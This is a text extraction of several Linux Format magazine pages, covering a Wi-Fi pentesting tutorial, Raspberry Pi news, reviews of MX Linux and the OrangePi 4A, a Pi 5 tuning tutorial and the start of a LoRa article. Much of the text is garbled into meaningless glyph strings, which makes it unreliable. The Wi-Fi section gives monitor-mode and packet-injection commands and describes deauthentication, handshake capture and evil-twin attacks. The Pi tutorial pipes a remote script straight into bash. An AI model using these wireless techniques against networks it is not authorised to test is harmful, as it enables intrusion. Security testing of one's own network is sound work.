comes to finding a suitable Wi-Fi Once your Wi-Fi adaptor is in monitoring mode, you can then use Aireplay-ng
adaptor is whether it supports ijČǎÆéÐÆüǎŋéÐijéÐĨǎìijǎĬķĥĥČĨijĬǎĥ­ÆüÐijǎìĆùÐÆijìČĆƧ
monitor mode, aka RFMON
(Radio Frequency MONitor) mode. This means that This lists the details and names of all wireless
with the right software, the adaptor can monitor traffic network interfaces. Make a note of the one for your
on a wireless channel without being connected to an Wi-Fi USB adaptor – 4)+8*,+, for example. If you’re
If you place AP (access point). This is crucial, as the ability to not sure which one is right, use a terminal to run:
your adaptor monitor packets that aren’t connected to your device $ sudo airmon-ng
into monitoring enables you to carry out network reconnaissance This lists any wireless adaptors or cards that
mode using stealthily, in the same way a cybercriminal would. support monitor mode. If you want to test this out for
Airmon-ng, the This means that you can perform a realistic analysis yourself, first have Airmon-ng end any processes such
tool may change of your network’s overall security. For instance, you can as the Network Manager that might interfere with
the name of
analyse packet headers to detect weak encryption monitoring mode:
your wireless
protocols like WEP. Monitoring mode is also useful for $ sudo airmon-ng check kill
interface if
it’s too long. detecting rogue devices connected to your network. Next, try to start your USB Wi-FI adaptor in
Double-check Bad actors also sometimes make use of monitoring monitoring mode using the interface name:
this by running mode as a precursor to carrying out more invasive $ sudo airmon-ng start wlan0mon
iwconfig attacks. For instance, tools such as &/,!2*-v+$can This done, you can double-check that the Wi-Fi
after your be used to capture the handshake as devices connect adaptor is in monitoring mode by running iwconfig
adaptor is set to the router. This data can then be used to recover once again. If it’s working correctly, you’ll see Mode
to monitoring wireless security keys. now reads as Monitor.
mode. This If you already have a USB Wi-Fi adaptor, you can
ŋìÿÿǏÿìĬijǎijéÐǎ
ĆÐŋǏĆ­ąÐƧ
check if it supports monitoring mode. Connect the Packet injection
adaptor to a USB port, open a terminal and run: The ideal hacker’s Wi-Fi adaptor also needs to be able
$ iw list 1,&+'" 1/4@8:o99#/*"0&+1,4&/")"00+"14,/(o
This lists the capability of all your wireless devices. This is vital for simulating real-world attacks on your
Scroll down to Supported Interface Modes for your network. For example, hackers use packet injection to
chosen device to see if Monitor is listed. carry out deauthentication attacks. These are designed
If you’re still unsure, you can also double-check this to forcibly boot devices off legitimate wireless
using a pentesting distro like BackBox. If, like us, you’re networks. Once done, cybercriminals can then try to
running your distro using virtual machine software, you capture the handshakes of devices as they reconnect.
may need to manually configure your VM to connect to Packet injection is also useful if you want to set up a
the USB Wi-Fi adaptor. For instance, in &/12),5go rogue access point. In the wild, hackers sometimes
1,"3& "0–+!0")" 16,2/!-1,/1, ,++" 1&1o create these honeypot networks with a view to luring
Once your OS loads, open a terminal and run: unsuspecting users into connecting to what seems to
$ iwconfig be a legitimate network. Impersonating a legitimate AP

40 LXF326 April 2025 www.linuxformat.com

 Hacking Academy

by injecting carefully crafted frames is sometimes

known as an evil twin attack. TUX’S CHALLENGE!
Assuming your wireless adaptor is already in
monitoring mode, you can easily test if it supports In real life, there are few reasons why a legitimate pentester would
packet injection using Aireplay-ng – for example: need a cantenna, as they don’t have to hide what they’re doing. Still,
$ sudo aireplay-ng --test wlan0mon building one can be a fun project and can save you some cash.
If successful, you’ll see a notification stating %"+ %,,0&+$6,2/ +n0&7"*11"/0o%""01,+"0n02 %0
‘Injection is working!’ If you’re using your Wi-Fi adaptor 0,2- +0n%3"!&*"1"/,#@o=vAo= *o
with a virtual machine, sometimes this won’t work right ,2)0,+""!+v16-"#"*)" %00&0v*,2+1 ,++" 1,/o%"0"
away. Open a terminal and stop Airmon-ng: +"#,2+!3"/6 %"-)6,+,+)&+"/"1&)"/0)&("*7,+,/"6o
$ sudo airmon-ng stop wlan0mon Next, drill a hole to place the connector. The placement of the hole
Repeat the steps above to test once more if your &0.2&1"&*-,/1+1o ,/ +1%1}0@o= * /,00n-) "1%" "+1/",#
Wi-Fi adaptor supports packet injection. 1%"%,)""5 1)6=o:= *#/,*1%"0"o
,2)0,+""!0,*"9:v$2$" ,--"/4&/"o%&0$,"0&+1,1%"
Driver dilemmas brass stub in the N-connector. The total length of both the brass
If your chosen Wi-Fi adaptor isn’t fully compatible with 12"+!1%"4&/"01& (&+$,21-011%" ,++" 1,/0%,2)!";o9 *o
your pentesting distro, you’ll need to choose another. 0"0,)!"/&+$&/,+1,-) "1%"4&/"&+1,1%" ,++" 1,/n(""-&+$&1
,2/#&/01 ,+ "/+0%,2)!"1%" %&-0"120"!o as straight as possible.
Ideally, this should be one that works out of the box in Once the cantenna has been assembled, you need an N-to-SMA
your chosen distro, otherwise you’ll have to manually converter and an SMA cable to connect it to your Wi-Fi adaptor.
download and install the drivers yourself. Again, these can be obtained cheaply from online retailers.
There are many options, though from our research,
it seems the Alfa series of Wi-Fi adaptors is among the
most popular. The manufacturer even maintains a list
of Kali Linux-compatible hardware: 444o)#o ,*o14š
,))" 1&,+0š()&v)&+25v ,*-1&)"š.
Still, it’s important to do your own research. For
&+01+ "n)#)&010&108;> "51"/+)&v &
adaptor as Kali-compatible. However, a quick search of
&10")1"(@@9: %&-0"10%,401%10,*")&
users have had issues placing it into monitor mode.
,*"/"1&)"/0n02 %0*7,+n)0,)&01&+25v
compatible adaptors, which is how we found our device
,# %,& "n1%"+!>888Ao
Once you’re sure your device is compatible, check
&#&1}0!2)v+!o6"/ /&*&+)0)*,01 "/1&+)620"
!-1,/01%102--,/1:o< 7+!= 7+"14,/(0n0 ­ĆijÐĆĆ­ĬǎÆ­ĆǎÐŐijÐĆÌǎőČķĨǎĬìäĆ­ÿǎĬijĨÐĆäijéƨǎĥĨČŊìÌÐÌǎőČķǎÆéČČĬÐǎijéÐǎ
it increases their attack surface. This means dual-band ĨìäéijǎĬìřÐǎČãǎÆ­Ćǎ­ĆÌǎÌĨìÿÿǎijéÐǎéČÿÐǎĥĨÐÆìĬÐÿőƧ
devices help you carry out more realistic tests.
As you’re browsing through different adaptors, you’ll
notice many that come with one or more external detachable, you can even hook up your own cantenna
antennas to improve signal strength and stability. This ƒ0"",5,21,3"„o
is useful for black hat hackers, who want to stay hidden
as they carry out activities like setting up rogue APs. Setting up your antenna
1&))n1%")1"01= 7+"14,/(0+!4&/")"00 As we mentioned, the ideal pentesting Wi-Fi adaptor
01+!/!0)&("&v &>ƒ@8:o995„/")6%"3&)6,+  will work out of the box. However, you may need to
(multiple input, multiple output) of the kind that can be implement some tweaks to get it up and running.
offered by multiple antennas. This means it can’t hurt ,/&+01+ "n#,/1%"@@9: %&-0"1n6,2 +
to buy a Wi-Fi adaptor that supports them. If they’re install the drivers using DKMS, which can automatically
recompile and install kernel modules when a new
kernel is installed or updated. Install DKMS with:
$ sudo apt install dkms
,2 +1%"+20"$&11,!,4+),!1%"+" "00/6
driver files, then switch into the new directory:
$ git clone -b v5.6.4.2 https://github.com/aircrack-ng/
rtl8812au.git
$ cd rtl*
,2 +1%"+&+01))1%"!/&3"/&10")#6/2++&+$p
$ sudo make dkms_install
These steps are specific to adaptors using the
")1"( %&-0"1o,2*6+""!1,0(1%"*+2# 12/"/
for instructions on how to do this for your hardware.
This is why we recommend choosing a Wi-Fi adaptor
}ČąÐǎČãǎijéÐǎąČĬijǎĥČĥķÿ­Ĩǎ›ìƽ6ìǎ­Ì­ĥijČĨĬǎ­ĨÐǎĥĨČÌķÆÐÌǎÅőǎ
ÿã­ƧǎéÐÆüǎ that works out of the box in your pentesting distro.
ìijĬǎŋÐÅĬìijÐǎijČǎĬÐÐǎŋéìÆéǎąČÌÐÿĬǎ­ĨÐǎÆČąĥ­ijìÅÿÐǎŋìijéǎN­ÿìǎPìĆķŐƧ

www.techradar.com/pro/linux April 2025 LXF326 41

 Pi USER
Raspberry Pi turns green Les Pounder
works with groups
such as the
Raspberry Pi
Now the Foundation is publicly listed, it’s reporting Foundation to help
boost people’s
on how it’s reducing its environmental impact. maker skills.

hen Raspberry Pi floated on the

THANKS FOR
W London Stock Exchange on 11th
June 2024, it was awarded the LSE’s THE MEMORY?
Green Economy Mark. This recognises that
not only are the Pi Foundation’s products Raspberry Pi certainly started
efficient but they actively displace other less 2025 with a bang, releasing yet
sustainable technologies. another new product. This time it
Just some of the activities that help add is a 16GB model of the Raspberry
1,1%"0"/"")&*&+1&+$-)01& - ($&+$ Pi 5. It is essentially the same
where possible, shrinking packaging sizes The Foundation continues to follow sustainable practices. board as the Raspberry Pi 5 2GB,
and working on efficient production methods. with the newer D0 stepping that
One is the new intrusive reflow soldering focus on providing affordable and accessible offers a more power-efficient
process for the Pi 5. This both saves energy technology for all.” system-on-a-chip, with portions
and reduces the physical manufacturing Part of the new drive is to measure its of redundant functionality
footprint at the factory, while increasing carbon footprint across what are known as removed from the chip (the
throughput. While some might scoff at green Scope 1, 2 and 3 emissions. Scope 1 are the functionality has been moved
credentials, these literally contribute to lower direct emissions from sources owned or 1,1%"90,21%/&!$"„n+!
costs, increasing efficiency. controlled by a company, while Scope 2 16GB LPDD5X RAM chip used
Now that the Foundation is a public /"&+!&/" 1"*&00&,+0#/,*$"+"/1&+$1%" instead. So, what does this new
)&*&1"! ,*-+6n&1}0 /"1"!201&+&)&16 energy that the company purchases. Scope 3 Raspberry Pi 5 retail for? Well,
Committee to oversee activities like these. encompasses all the other indirect emissions %"/"&01%"(& ("/p^99=o%1&0
Roger Thornton, the Pi’s principal hardware in a company’s value chain, from raw material around £40 more than the 8GB
engineer, stated: “Raspberry Pi aims to be a production to employee commutes. Raspberry Pi 5, and to be honest,
leader in sustainable practices within the It’s a complex subject and you can find out the 8GB model is enough for
technology sector while maintaining our core more at https://bit.ly/lxf326green. most users.
Those who will benefit the
*,01#/,*1%"!!&1&,+)/"
people interested in containers

Pi 5 PCIe 3.0 LoRa laughs

CREDIT: www.tiktok.com/@veggievampire, Seeed

such as Docker, and those using

the Raspberry Pi 5 for artificial-
intelligence and machine-learning
Double the M.2 fun! Meshtastic BBS. projects. The original top-spec
Raspberry Pi 5’s 8GB of RAM
The Seeed Studio PCIe 3.0 to Dual M.2 As we write about LoRa (see p.48), check out 40)&11)"1&$%1#,/*+60
HAT costs just $45. For that price, you get this project by VeggieVampire. As part of a (large language models), but
one PCIe 3.0 lane per M.2 slot, with 8GT/s Meshtastic network, it uses LoRa radios. It 1%"9> *,!")$&3"020)&11)"
throughput across both slots. Besides the uses the Pi as a node but VeggieVampire has more space to try out a myriad
obvious use case of M.2 SSDs, it’s also created a way to play games on a custom ,#*,!")0o
intended for use with other devices, bulletin board system (BBS), just like we did I’ve reviewed the Raspberry Pi
including AI accelerators, which also &+1%"}@80jhttps://bit.ly/lxf326mesh 5 16GB and it is impressive, but
function within the form factor. the price tag puts it in the same
https://bit.ly/lxf326seeed range as an Intel N100 SBC, which
also comes with 16GB of RAM
and NVMe SSD. The N100 is also
more powerful than the Pi 5 and
it can run any Linux distro – and,
yes, even Windows.
The Raspberry Pi 5 16GB is a
great machine, but so is the 8GB
model, and that keeps £40 in our
pockets. This makes the 16GB a
considered purchase for the
majority of us.
Speed up your AI or drives. Play old-school text games!

www.techradar.com/pro/linux April 2025 LXF326 43

 REVIEWS Linux distro

MX Linux 23.5
Les Pounder takes his annual spin with MX Linux on the Raspberry Pi 5.
Has it improved since 2024? Spoiler: yes!
X Linux is a lightweight alternative to
IN BRIEF
An alternative
M the official Raspberry Pi OS and you
would expect that it would be a lesser
Raspberry Pi OS product compared to the official OS. But MX
based on Linux 23.5, powered by Debian 12.9 Bookworm
Debian and using Xfce 4.20, is a joy to behold. We
Bookworm and 1"01"!1%")1"01&1"/1&,+,+&=< n1%"
designed for sweet spot for price and performance.
the Raspberry After flashing to a fast microSD card, we
Pi 4, 400 and 5. booted to the setup screen and followed the
The OS offers process of setting up the OS for the first time.
),1v#/"" On boot, we were greeted with a login screen,
refined desktop and then we got access to the glorious MX
experience. Linux desktop. In the top-right are system The MX Linux 23.5 desktop is clean and welcoming. It feels like a
Everything is details (disk usage, CPU temp and memory place where we can get work done.
easy to find usage) along with the time and date. To the left
+!4" + is the main menu and system tray. We like this setup, the software for many HATs is designed specifically for
20"1%" 21&11,,()&11)"4%&)"#,/,2//&+1,$"120"!1,&1o Raspberry Pi OS.
#,/41 %&+$ ,4"3"/n#/,*1%"*&+*"+24" +.2& ()6,-"+ We tested the official Raspberry Pi Camera Module 3
media, writing network settings, Bluetooth and so on. Wi-Fi connection and it worked great. But, just like MX Linux 23.1, there is
code or was a simple task thanks to the Network Manager, and no preview window to help us frame a shot – however,
browsing the Ethernet just worked. Bluetooth connections to our we can take pictures and video with the camera. A
internet. It mobile devices were easy and we soon had files copying preview would be a real benefit, though.
offers most of to and from our devices. The Pi 5 introduced a dedicated PCIe connection for
the Raspberry devices such as NVMe SSDs, so we installed MX Linux
Pi OS Tooling up 1, " "+;!/&3"n+!20"!&+",/!0 1/&3"j
experience ,&+$ (1,1%"*&+*"+2n&1&00-)&1&+1, 1"$,/&"0n Nano connected to the Pi 5. MX Linux 23.5 is much
+!#"12/"0 like many other OSes. Inside the MX Tools section, we #01"/4&1%+"!/&3"/2++&+$1 " "+;0-""!0o
&+-)"0+1 find useful tools for disk management and system That said, the microSD experience was snappy, too.
package. config. Installing applications is a breeze using either the The OS is light, but feels complete. It could be a viable
 --)& 1&,+,/1%"1"/*&+)o00"+1&))64"/"20&+$ alternative to Raspberry Pi OS. YouTube video playback
Debian Bookworm-based system, so there’s a plethora is decent: 1080p 30 frames is solid; at 1080p 60, we get
of applications and tools that we can install. We chose to a solid experience, too. In one minute, it dropped 43
install GIMP and everything worked as we expected. frames from a total of 3,807 (1.12%), a vast improvement
This respin is designed for the Raspberry Pi, and the over MX Linux 23.1, which dropped 40% back in 2024.
Running GIMP &%0#"4("6#"12/"01%14"+""!1,1"01p1%"  n MX Linux 23.5 for the Raspberry Pi 5 is a delight to
and transferring camera and, for the Raspberry Pi 5, NVMe SSDs. First use, it has its quirks (the camera, for instance) but it
an image from
our smartphone 1"01401%"  o0&+$  "/,n4" ,+1/,))"!+ works well as a general-purpose OS, and it can be used
was an effortless LED with ease. If you want to use your favourite HAT, you #,/  -/,'" 10o%"&0#01,+*& /, /!n+!
experience. will need to do the extra work to make it work because even faster on an M.2 NVMe SSD.

VERDICT
DEVELOPER: MX Linux
WEB: https://mxlinux.org
LICENCE: Mixed

FEATURES 9/10 EASE OF USE 9/10

PERFORMANCE 9/10 DOCUMENTATION 9/10

Lightweight and easy to use, MX Linux has a few quirks but

don’t be put off what is a great and fast general-purpose OS.

Rating 9/10

44 LXF326 April 2025 www.linuxformat.com

 SBC REVIEWS

OrangePi 4A
The ingredients are all there, but this Pi just doesn’t taste
sweet enough for Les Pounder.
rangePi has released a slew of boards
SPECS
SoC: Allwinner
O over the years and one of its latest is
1%"/+$"&<n4%& %n01%"+*"
T527 8-core suggests, takes aim at the older Raspberry Pi 4’s
ARM market. The OrangePi 4A is an octa-core CPU
Cortex-A55 with onboard M.2 NVMe SSD support. It could be
1.8GHz an alternative to the Raspberry Pi 5 if you don’t
RAM: 2GB/4GB need the absolute horsepower.
LPDDR4/4X The nearest comparison for the OrangePi 4A
Storage: is the Raspberry Pi 4 4GB. Sure, the OrangePi 4A
MicroSD, has four more cores, but the systems run
eMMC, M.2 remarkably similar. To look at, they are quite
NVMe SSD different. For starters, the PCB cooler is different,
Comms: Gigabit as is the USB and Ethernet port placement. The
Ethernet, Allwinner SoC is rotated 45 degrees and we have A little larger than the Pi 4, but then oranges always are…
Wi-Fi 2.4/5GHz, a single HDMI port. Flip it over, and the M.2 NVMe
Bluetooth 5.0 slot is visible, but note that it is only compatible with powerful beast. In multi-core, the OrangePi 4A ran away
USB: 4x USB 2280 drives. There is also an eMMC socket, used for an with a score of 1,033, versus the Pi 4’s 719.
2.0, 1x USB 2.0 optional eMMC module, which should run faster than The GPIO on many Raspberry Pi alternative boards is
Display: microSD but slower than NVMe. often an afterthought, but this isn’t entirely true for the
1x HDMI 2.0 The OrangePi 4A performs somewhere between a OrangePi 4A. We can access the GPIO using WiringPi via
4K@60, 1x MIPI Raspberry Pi 4 and a Pi 5. It’s not a bad experience, but it Bash and we tested blinking an LED and all was good.
DSI, 1x eDP1.3 feels slower than the Pi 5. We tested running the Debian PWM is possible via Bash. Python, on the other hand, is
Camera: OS from a class A2 microSD card. very similar to the old RPi.GPIO Python module
1x 2-lane MIPI- The boot time of the OrangePi 4A is roughly nine WiringPi for Python works well enough; it is a little
CSI, 1x 4-lane seconds longer than the Raspberry Pi 4 and 11.47s clunky when compared to refinements such as GPIO
MIPI-CSI slower than the Pi 5. The OS in general was responsive, Zero. We were able to connect and use a very old
GPIO: 40-pin but at times it did run a bit slower than we would’ve liked. &/")),/!6*--&+$1%"-&+,21,#1%",/!1,
Pi pinout 1%"&/&+$&-&+/"#"/"+ "0o%"+n4&1%#"4)&+"0,#
Audio: 3.5mm Slow motion Python, we had the red, yellow and green LEDs lighting
audio jack Applications on the OrangePi 4A felt slower than the up. According to the user manual, there was no reference
PSU: USB C Raspberry Pi 4. Chromium was a close call – just over a to PWM for Python, but we know for a fact that WiringPi
5V 5A second between the Raspberry Pi 4 and the OrangePi can do this. So, after a little Googling, we found a script
Size: 89 x 56 4A. But GIMP was almost twice as fast on the Raspberry that we adapted to PWM pulse Pibrella’s red LED.
x 18mm Pi 4 (8.9s) versus the OrangePi 4A’s 15.54s. If you plan to use one of the best Raspberry Pi HATs
YouTube playback was awful. Big Buck Bunny was with the OrangePi 4A, your mileage may vary. Many
dropping frames and at one point, YouTube tried to drop HATs use a mix of I2C, UART, SPI, PWM and digital IO, so
the resolution from 1080p to 480p just to give us a it depends on how their software is written, and you may
playable frame rate. What about local playback? Not need to do a little hacking to make it all work.
great! We used a 4K test file on VLC. Normally, VLC plays
anything, but this time it just ground to a halt.
The onboard Gigabit Ethernet port is comparable with
VERDICT
the Raspberry Pi 4 – there was just 1Mb/s between the DEVELOPER: OrangePi
two during our iPerf tests. For Wi-Fi performance, the WEB: www.orangepi.org
OrangePi 4A wins with 149Mb/s versus the Raspberry PRICE: £40 4GB (£35 2GB)
&<}098:š0o%""51"/+)+1"++*6%3"042+$
the result in the OrangePi 4A’s favour. FEATURES 9/10 EASE OF USE 6/10
Power usage at idle is where the Raspberry Pi 4 PERFORMANCE 7/10 VALUE 8/10
4&+0n0&--&+$,+9o=;n ,*-/"!1,1%"<o=A,#1%"
OrangePi 4A. Under load, the OrangePi 4A consumed If you need a little more power than a Raspberry Pi 4, and
7.14W and the Pi 4 6.12W. want onboard NVMe, the OrangePi 4A is a contender, but you
The Geekbench 6 single-core score of 242 shows need to be an experienced user to get the most out of it.
that the Arm Cortex A55 is slightly less powerful than
the Arm Cortex A72 on the Pi 4. But when we see the Rating 7/10
multi-core test results, the OrangePi 4A is a much more

www.techradar.com/pro/linux April 2025 LXF326 45

 TUTORIALS Raspberry Pi 5

RASPBERRY PI 5

Get the most from

your Raspberry Pi 5
Faster CPU, storage and RAM for your Raspberry Pi 5 has Les Pounder
shouting with a raspberry yell, “More! More! More!”

%"0-"//6&=&0)/"!6

T 0-""!!"*,+n211%"/"
/"460+!*"+01,
0.2""7""3"+*,/"-"/#,/*+ "
#/,*&1n+!&+1%&0121,/&)4"4&))"
OUR !,&+$'2011%1o"}))"04--&+$
,2/*& /,01,/$"#,/ ";o8v
EXPERT 0"!"o:#,//,2+!
Les Pounder ^<8n211%14&))"1%",+)6 ,01o
is associate #1"/1%1n))1%"2-$/!"0/"#/""o
editor at Tom’s %"6'201/".2&/")&11)"4,/(o"}))
Hardware and a ",3"/ ), (&+$1%"1,$"1
freelance maker 0,*""51/#/""-"/#,/*+ "n+!
for hire. He %+$&+$1%"1&*&+$01,$"1
ŹȍȶnjɽࢳŔŹȶʠʋ 1%"*,01#/,*1%"*o &+))64"0%))
ǠǫɽࢳŔƎʽơȥʋʠɭơɽ ""+)&+$*"+0#,/1%"&
and projects at +!1,4,/("11"/1,$"1%"/o This is the Raspberry Pi 5 16GB and now it has been overclocked, runs from an
http://bigl.es. Best of all, this is already set in the NVMe SSD, and the SDRAM timings have been tweaked.
("/+")q4"'201+""!1, 1&31"&1o
0"3"/n1(" /"o"}/"-20%&+$1%"0-"//6&= our money is the Pineboards HatDrive! Nano. For £9,
YOU NEED )&11)"%/!"/1%+&10*("/04,2)!)&("n0,"+02/"6,2 1%&0&03"/6 %"-461,!!+1,0-"//6
*(" (2-0,#+64,/(n+!%3"!".21" ,,)&+$ &=o /6,2/0")#:=> 0-"//6&v/+!"!o:
A Pi 5 #,/6,2/0-"//6&=o,2)0,+""!1%",##& &) "ƒ/,2+!^:@„+!6,2/",+6,2/461,
NVMe SSD 0-"//6&=:?-,4"/02--)6" 20"&1-/,3&!"0 0-""!60601"*o
NVMe HAT *,/"1%+"+,2$%-,4"/#,/,2/,3"/ ), (&+$o ,n%,4!,4"!!+1,,2/0-"//6&=l
Cooling for &/01,#))n4"+""!1,4/&1"0-"//6&1,
your Pi 5 Adding an NVMe SSD *& /, /!n1%"+00"*)",2/ %,0"+" 
%"&$$"010-""!,,01,+0-"//6&=4&)) +!11 %1%""o,4"/2-+!4%"+6,2
,016,2&1,#*,+"6o%"0-"//6&=&+1/,!2 "! $"11,1%"0-"//6&!"0(1,-n,-"+1%"*&+*"+2
 " ,++" 1,/,+1%"1/!&1&,+)&)6,21o +1%" +! )& (,+ "00,/&"0–/!,-&"/o"1,-6
6"/0&+ "/")"0"n1%"/"%0""+-)"1%,/,# "& /,*"3& "1,6,2/*& /, /!n+!,-6,"3& "
!!v,+0n+!*+6o:" 0o%""01#,/ 06,2/"o)& (1/11, ,-61%" 2//"+1
&*$"1,1%""o%"+!,+"n )& (),0"o,4
6,2%3"4,/(&+$ ,-&"!1,1%""n4"
+""!1,1"))1%"0-"//6&1,,,1#/,*&1o-"+
1"/*&+)+!/2+1%&0 ,**+!p
$ sudo rasp-config
0&+$1%" 2/0,/("60n0 /,))!,4+1,!3+ "!
-1&,+0+!-/"00+1"/o,40 /,))1,,,1/!"/+!
Tweaking the -/"00+1"/o")" 1"š,,1+!-/"00+1"/o
SDRAM timings %"+-/"00+1"/1, ,+#&/*1%11%""!/&3"&0
is super-simple, +,41%",,1!"3& "o , (1,!3+ "!-1&,+0n
and provides
around 5-10%
+!0")" 1 "-""!o"11%&01,"+)" ";o8
performance 0-""!0ƒ/,2+!?88š0/"!0-""!„+!-/"00+1"/n
boost, for free! 1%"++1"/o5&1#/,*raspi-config and reboot your

46 LXF326 April 2025 www.linuxformat.com

 Raspberry Pi 5 TUTORIALS

0-"//6&=o,2/"+,4,,1&+$+!/2++&+$1%" Geekbench 6 is
#/,*1%"*2 %#01"/ ";o8v0"!"j a great means
to qualify all of
the work that
Overclocking the CPU you have put in
"#,/"4",3"/ ), (1%"&=}0)/"!6012-&!)6#01 to tweaking your
:o< 7n4"+""!1,"+02/"4"%3" ,,)&+$o Raspberry Pi 5.
$,,!-00&3" ,,)"/&01%"*&+&*2*q/"))6n6,20%,2)!
%3" 1&3" ,,)&+$o%",##& &)0-"//6& 1&3"
,,)"/&0$/"1n0&0/$,+<8}0 ;8**
 1&3",,)"/o"0n6,2 +$"10,*"%,1/,!v016)"
,,)"/0n21^= 1&3" ,,)"/0/"*2 %"11"/!")j
n0,6,2%3"1%" ,,)&+$11 %"!n+!1%"&&0
,,1"!1,1%"!"0(1,-o-"+1"/*&+)+!"+02/"))
6,2/0,#14/"+!/"-,0&1,/&"0/"2-1,!1"p
$ sudo apt update && sudo apt dist-upgrade
"51n,-"+1%"config.txt file in nanoo%"#&)"&0 2-!1"1,"3"/&#&"!0 ,//" 1n1%"+/",,11%"
), 1"!&+1%"/boot/firmware !&/" 1,/6p 0-"//6&=#,/+,1%"/#/""0-""!,,01o
$ sudo nano /boot/firmware/config.txt
 /,))1,1%""+!,#1%"#&)"+!!! ,**"+1n NUMA emulation
#,)),4"!66,2/!"0&/"!0-""!o1& (1,"),4; 71, ,+v2+&#,/**"*,/6 "00ƒ„&04%"/"
01/14&1%n,1%"/4&0"6,2*6$"1+&+01+1 /0%p *"*,/6), 1&,+ "001&*"03/6!"-"+!&+$,+1%"
#Overclock }0-/,5&*&161,1%"*"*,/6o/!&1&,+))6&+
arm_freq=2800 0601"*0n" %-/, "00,/%0&10,4+*"*,/6+(#,/
/"001/)n1%"++!+1"/1,03"+! ),0"o #01"/ "00o%&0&0+}11%" 0"4&1%1%"0-"//6
,4/",,16,2/&=o,2/0-"//6&=0%,2)!,,1 &=n214" +"*2)1"&1+!-/,3&!"/,2+!=
0+,/*)n21&#+,1n!,+}14,//6o,4"/ 6 )"1%"&=n +!9:-"/#,/*+ ",,01#,/0&+$)"+!*2)1&v ,/"
+!%,)!1%"%&#1("62+1&)6,20""1%"!"0(1,-o%&0 /"0-" 1&3")6o%""011%&+$l%"-1 %"01,*("1%&0
4&))1"))1%"1,&$+,/"config.txt, essentially booting 4,/(/"+,4-/1,#0-"//6&n0,))6,2+""!
&+1,0#"*,!"o%"+6,2 +/"v,-"+config.txt and 1,!,&0,-"+1"/*&+)+!/2+#2))2-$/!"n/",,1n
14"(1%",3"/ ), (1,),4"/0-""!+!/",,1o +!6,2/"!,+"p
, %" (1%1+,3"/ ), (&002 "00#2)n,-"+14, $ sudo apt full-upgrade
1"/*&+)4&+!,40o +1%"#&/01n&+01))+!/2+stress. #1"/1%"/",,1n,-"+1"/*&+)+!/2+1%&0
%&001/"00v1"0106,2/n#,/ &+$&11,4,/(%/!o ,**+!1, %" (#,/p
"/"4"/2++))v ,/"ƒ<„01/"001"01#,/>80" ,+!0p $ dmesg | grep NUMA
$ sudo apt install stress #6,20""1%&0)&+"n1%"+"3"/61%&+$&04,/(&+$p
$ stress -c 4 -t 60 [ 0.000000] mempolicy: NUMA default policy
+1%"0" ,+!n20&+$watch, use vcgencmd to read overridden to ‘interleave:0-7’
1%"0-""!"3"/614,0" ,+!0o0&+$watch, the ,1%"/"4"$,n#,/+,1),1,#*,+"6n+!'201
0-""!2-!1"06&10")#o,01,-&1n-/"001/)1, #"4)&+"0,# ,!"n4"%3""("!,21)&11)"*,/"
/"(1%"/2++&+$ ,**+!p -"/#,/*+ "#/,*,2/0-"//6&=o
$ watch vcgencmd measure_clock arm
%",21-214&))0%,40,*"1%&+$)&("
frequency(0)=2800023808 n4&1%1%":@88 CHECKING YOUR PERFORMANCE
/"-/"0"+1&+$:o@ 7o,2'201$,1#/""0-""!,,01j
"+""!1,.2+1&#61%"-"/#,/*+ "$&+0*!"4&1%1%&0121,/&)n
Faster RAM and the best means to do so is using Geekbench, 21&1 +"1/& (6
%"1&*&+$0#,/1%"0-"//6&=/")&11)" 1,&+01)),+1%"0-"//6&=n0,)"1}020"0,*"1%&+$3"/60&*-)"j
,+0"/31&3"6!"#2)1x1%"6%3"1,"1,"+02/" Pi-Apps &0  v0"!&+01))"/#,/0)"4,#--0+!$*"0n+!
1%1"3"/61%&+$4,/(0,21,#1%",5o21n#,/1%,0",# "01,#))&120"00&*-)",+"v)&+"&+01))"/o%&0&0+}1)4601%""01
204%, /3"*,/"-"/#,/*+ "n+!!,+}14+11, *"+01,&+01))+--)& 1&,+n "/1&+)6+,1&+-/,!2 1&,+n21&+1%&0
0-"+!+6*,/"*,+"6n4" +$"1/,2+!98v:8 0"&1&0o-"+1"/*&+)+!"+1"/1%&0 ,**+!p
"51/-"/#,/*+ "1:o< 7n#,/#/""n614"(&+$1%" $ curl -sSL https://git.io/JfAPE | bash
1&*&+$0 2+1%"&+01))"/+!4&1#,/&11,#&+&0%oPi-Apps ++,4"#,2+!
-"+1"/*&+)+!/2+ ,**+!1,2-!1"6,2/ &+1%" "00,/&"00" 1&,+,#1%"*&+*"+2o")" 1,,)0n+!1%"+
0-"//6&n+!-/"001, ,+#&/*o,1"1%11%&04&)) Geekbench 6. ")" 1 +01))+!4&1#,/1%"&+01))1,#&+&0%o,4
2-!1"6,2/#&/*4/"n0,!,0,4&1% /"p ,-"+1"/*&+)+!/2+Geekbench 66"+1"/&+$1%"#,)),4&+$p
$ sudo rpi-update $ geekbench6
",,16,2/&=+!/"v,-"+1"/*&+)4&+!,4o 2+1%/,2$%1%"Geekbench"+ %*/(0+!6,24&))$"10 ,/"
,44"+""!1,"!&11%",,1),!"/ ,+#&$#&)"p 11%""+!o%&0&01%"+),$$"!1,+,+)&+"!10"o,2 + )&*
$ sudo rpi-eeprom-config -e 1%"0 ,/"&#6,2%3"+ ,2+1o,1%&0"#,/"+!#1"/6,2%3"
,1,1%")01)&+"&+1%"#&)"+!!!1%&0)&+"o%"+ /2+1%"14"(01,0""%,44"))6,2/0601"*%0-"/#,/*"!o
-/"001/)n+!+1"/1,03"+!"5&1o&1#,/1%"

GET YOUR Pi FILLING HERE Subscribe now at http://bit.ly/LinuxFormat

www.techradar.com/pro/linux April 2025 LXF326 47

 TUTORIALS Long-range wireless

LORA
Credit: www.semtech.com/lora

Long-range wireless
without pesky bills
Exchanging data over long ranges without paying carriers a fortune
sounds like a dream, but Tam Hanna and LoRa technology let you do it!

ven though legacy network

E operators improved their IoT

networking game significantly,
there are still situations where non-
cellular systems work better.
OUR After all the dust around the Sigfox
organisation’s bankruptcy has lifted, a
EXPERT large and smiling winner remains: the
Tam Hanna ,š,+"14,/(-/,1, ,)
has wrangled developed by Semtech.
with wireless ,1,+)6%0&1*+$"!1,1("&10
module designs place in the wireless industry without
from the time political turmoil, but the technology
when everyone works both in a peer-to-peer and in a
thought 3G network fashion. Furthermore, the
would kill us availability of a wide array of This connector should not be heated up.
Ŕȍȍࡳࢳ•ơʋǠǫɽ development boards means that you can
